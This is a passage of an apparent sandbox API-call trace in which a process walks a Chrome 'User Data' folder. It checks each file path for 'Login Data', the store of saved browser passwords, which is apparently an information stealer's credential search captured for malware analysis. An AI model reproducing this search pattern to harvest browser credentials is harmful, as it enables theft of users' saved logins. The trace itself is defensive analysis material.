GetProcessHeap () returned 0x8e0000 [0162.895] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925418 | out: hHeap=0x8e0000) returned 1 [0162.896] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.896] GetProcessHeap () returned 0x8e0000 [0162.896] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0162.896] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f8b8920, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f8b8920, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f8b8920, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="First Run", cAlternateFileName="FIRSTR~1")) returned 1 [0162.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.896] lstrlenW (lpString="\\") returned 1 [0162.896] GetProcessHeap () returned 0x8e0000 [0162.896] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0162.896] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0162.896] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0162.896] lstrlenW (lpString="First Run") returned 9 [0162.896] GetProcessHeap () returned 0x8e0000 [0162.896] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9c) returned 0x925360 [0162.896] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.896] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="First Run" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run" [0162.896] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.896] GetProcessHeap () returned 0x8e0000 [0162.896] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0162.896] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run", lpSrch="Login Data") returned 0x0 [0162.896] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.896] GetProcessHeap () returned 0x8e0000 [0162.896] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0162.896] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85749110, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c0bcce0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0bf3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1082a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local State", cAlternateFileName="LOCALS~1")) returned 1 [0162.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.896] lstrlenW (lpString="\\") returned 1 [0162.896] GetProcessHeap () returned 0x8e0000 [0162.896] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0162.896] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0162.896] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0162.896] lstrlenW (lpString="Local State") returned 11 [0162.897] GetProcessHeap () returned 0x8e0000 [0162.897] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa0) returned 0x925360 [0162.897] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.897] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="Local State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" [0162.897] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.897] GetProcessHeap () returned 0x8e0000 [0162.897] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0162.897] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State", lpSrch="Login Data") returned 0x0 [0162.897] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.897] GetProcessHeap () returned 0x8e0000 [0162.897] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0162.897] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OriginTrials", cAlternateFileName="ORIGIN~1")) returned 1 [0162.897] lstrcmpiW (lpString1="OriginTrials", lpString2=".") returned 1 [0162.897] lstrcmpiW (lpString1="OriginTrials", lpString2="..") returned 1 [0162.897] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.897] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.897] lstrlenW (lpString="\\") returned 1 [0162.897] GetProcessHeap () returned 0x8e0000 [0162.897] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0162.897] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0162.897] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.897] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0162.897] lstrlenW (lpString="OriginTrials") returned 12 [0162.897] GetProcessHeap () returned 0x8e0000 [0162.897] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa2) returned 0x925360 [0162.897] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.897] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="OriginTrials" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials" [0162.897] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.897] GetProcessHeap () returned 0x8e0000 [0162.897] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0162.897] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned 80 [0162.898] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned 80 [0162.898] lstrlenW (lpString="\\*.*") returned 4 [0162.898] GetProcessHeap () returned 0x8e0000 [0162.898] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xaa) returned 0x925410 [0162.898] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials" [0162.898] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\*.*" [0162.898] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0162.898] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0162.898] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.898] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0162.898] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0162.898] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0162.898] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0162.898] VirtualQuery (in: lpAddress=0x925410, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.898] GetProcessHeap () returned 0x8e0000 [0162.898] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925410 | out: hHeap=0x8e0000) returned 1 [0162.898] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.898] GetProcessHeap () returned 0x8e0000 [0162.898] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0162.898] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PepperFlash", cAlternateFileName="PEPPER~1")) returned 1 [0162.898] lstrcmpiW (lpString1="PepperFlash", lpString2=".") returned 1 [0162.898] lstrcmpiW (lpString1="PepperFlash", lpString2="..") returned 1 [0162.898] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.898] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.898] lstrlenW (lpString="\\") returned 1 [0162.898] GetProcessHeap () returned 0x8e0000 [0162.899] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0162.899] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0162.899] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.899] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0162.899] lstrlenW (lpString="PepperFlash") returned 11 [0162.899] GetProcessHeap () returned 0x8e0000 [0162.899] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa0) returned 0x925360 [0162.899] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.899] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="PepperFlash" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash" [0162.899] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.899] GetProcessHeap () returned 0x8e0000 [0162.899] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0162.899] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned 79 [0162.899] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned 79 [0162.899] lstrlenW (lpString="\\*.*") returned 4 [0162.899] GetProcessHeap () returned 0x8e0000 [0162.899] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa8) returned 0x925408 [0162.899] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash" [0162.899] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\*.*" [0162.899] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0162.899] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0162.899] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.899] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0162.899] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0162.899] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0162.899] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0162.900] VirtualQuery (in: lpAddress=0x925408, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.900] GetProcessHeap () returned 0x8e0000 [0162.900] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925408 | out: hHeap=0x8e0000) returned 1 [0162.900] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.900] GetProcessHeap () returned 0x8e0000 [0162.900] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0162.900] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e47510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e47510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e47510, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pnacl", cAlternateFileName="")) returned 1 [0162.900] lstrcmpiW (lpString1="pnacl", lpString2=".") returned 1 [0162.900] lstrcmpiW (lpString1="pnacl", lpString2="..") returned 1 [0162.900] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.900] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.900] lstrlenW (lpString="\\") returned 1 [0162.900] GetProcessHeap () returned 0x8e0000 [0162.900] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0162.900] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0162.900] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.900] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0162.900] lstrlenW (lpString="pnacl") returned 5 [0162.900] GetProcessHeap () returned 0x8e0000 [0162.900] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x94) returned 0x925360 [0162.900] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.900] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="pnacl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl" [0162.900] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.900] GetProcessHeap () returned 0x8e0000 [0162.900] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0162.900] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned 73 [0162.900] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned 73 [0162.900] lstrlenW (lpString="\\*.*") returned 4 [0162.900] GetProcessHeap () returned 0x8e0000 [0162.900] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9c) returned 0x925400 